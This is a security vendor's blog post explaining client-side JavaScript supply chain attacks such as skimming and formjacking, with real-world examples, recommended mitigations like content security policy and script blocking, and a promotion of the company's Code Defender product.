HUMAN Blog

How to Mitigate Client-side Supply Chain Threats

Written by HUMAN | April 20, 2022

When users create or log into an account, complete a transaction or submit a form of any kind, they are trusting you with their sensitive personal data. If your site collects credentials, credit card numbers and other personally identifiable information (PII), you are taking responsibility for protecting a piece of your users’ identity. But did you know that using client-side code from third-party libraries can put you at risk of a data breach and potentially make you noncompliant with data privacy regulations?

Third-party Code Leaves You Vulnerable

Writing code takes time and developer resources — and why reinvent the wheel? Third-party code libraries provide out-of-the-box, client-side scripts that enable common functionality such as social sharing buttons, advertising, payment iframes, chatbots and tracking scripts. Even better, these scripts run in users’ browsers rather than on your web server, speeding up load times and improving user experience. It’s no wonder that 70% of the code on an average website is sourced from third-parties, and most of it is JavaScript. A recent survey found that almost 65% of developers have done extensive development work in JavaScript code.

There’s just one problem. Like any code, JavaScript can contain vulnerabilities that open the door to a cyberattack. However, the fact that it runs on the client side means website owners have limited visibility into how JavaScript is behaving in users’ browsers. Code reviews and scans often miss malicious scripts that load dynamically in browsers, leaving developers in the dark on script activity at runtime. This is far from ideal for website owners looking to prevent supply chain attacks and adhere to compliance regulations.

The Risk of Client-side JavaScript

In order for third-party JavaScript to work, it needs access to your site, apps and data. This means granting it permission to access, modify, create and remove components from your site, including page elements, object prototypes, storage assets and network activity.

JavaScript has a lot of power. And cybercriminals know it. They target vulnerabilities in these client-side scripts to infiltrate your site in supply chain attacks. Here are two common types:

  • Digital Skimming and Magecart Attacks: Cybercriminals inject malicious JavaScript code that skims payment information. They can sell this information on the dark web or use it to make fraudulent purchases.
  • Formjacking: Attackers hijack login and checkout forms by injecting malicious scripts into vulnerable JavaScript code, allowing them to collect personal information such as social security numbers, usernames, passwords, PIN numbers and addresses whenever users submit a form. This is also called PII Harvesting. They sell the stolen data on the dark web or use it in account takeover attacks.

Real-world examples of client-side supply chain attacks include the recent attack on Segway that exposed the credit card data of its global users, and the infamous attack on British Airways that cost the company £183.39 million — approximately $229 million — in regulatory fines. The fine was ultimately lowered to £20 million, or $26.13 million — a relative victory, but still a huge financial loss that could have been avoided.

If your business suffers a client-side supply chain attack, the negative impact can be devastating. This includes regulatory fines, lawsuits, damage to brand reputation, loss of consumer trust, impaired site functionality and lower stock value.

How to Manage Client-side Threats

Client-side JavaScript provides significant advantages to the websites that use it; you just have to be aware of the risk and have a process for mitigating it. Here’s how:

  • Get real-time visibility into your client-side code - Maintain a complete view of the first-, third- and nth-party client-side scripts running in your environment.
  • Analyze client-side code - Evaluate how scripts are interacting with your website, what additional scripts they are interacting with and if they are accessing sensitive information.
  • Identify high-risk incidents - Determine PII, PCI and vulnerability incidents that response teams should prioritize. Actions such as HTTP requests to a new domain can signal that an investigation is warranted.
  • Get 360-degree contextual details - Drill into specific incidents to gather additional information, including when it happened, what actions were taken, the domains involved and how many users were impacted.
  • Mitigate the threat - Use a combination of content security policy (CSP) and granular browser-based JavaScript blocking to stop risky scripts from accessing data.
  • Continuously optimize - Analyze data to see incident trends week over week and track the reduction of PCI and compliance exposures, so you can optimize your future responses.

 

Enable Comprehensive Mitigation

Mitigating client-side supply chain threats requires a comprehensive approach. This includes enabling CSP and browser-based JavaScript blocking.

CSP limits the threat of cross-site scripting (XSS) attacks by directing the browser to enforce certain client-side policies and restrict what scripts and resources it can load for a given website. For example, the script-src directive in CSP can specify an allowlist of known domains from which inline scripts can be loaded. Unfortunately, CSP is all or nothing. It can thwart an attack involving a malicious code injection from an unauthorized domain, but it must stop the whole script.

This is where browser-based JavaScript blocking comes in. This capability provides granular control over legitimate JavaScript code, so you can block specific actions without disabling the entire script. Security teams can allow JavaScript to collect information from approved data fields — while simultaneously blocking sensitive PII and PCI data fields, like credit card information and SSN. This allows you to retain functionalities and enforce compliance with PCI and other privacy regulations.

Reduce Your Risk in Real Time

When it comes to comprehensive mitigation, HUMAN Code Defender has got you covered. This web app security solution provides comprehensive real-time visibility, control and mitigation of client-side threats to your website. By continuously monitoring and analyzing the behavior of all client-side scripts in real users’ browsers, Code Defender identifies script vulnerabilities, detects anomalous script behavior and proactively mitigates risk.

Code Defender inventories and baselines known expected behavior and then applies machine learning models to help identify new malicious, suspicious or anomalous behavior that warrants attention, with appropriate severity levels based on the level of perceived risk to your website. The solution runs 24/7/365 and provides both CSP and granular JavaScript blocking, giving security operations teams real-time visibility and control over client-side risks from first-, third- and nth-party code.

This ensures that your website is secure and compliant, while freeing your development team to focus on innovation. Learn more about Code Defender here.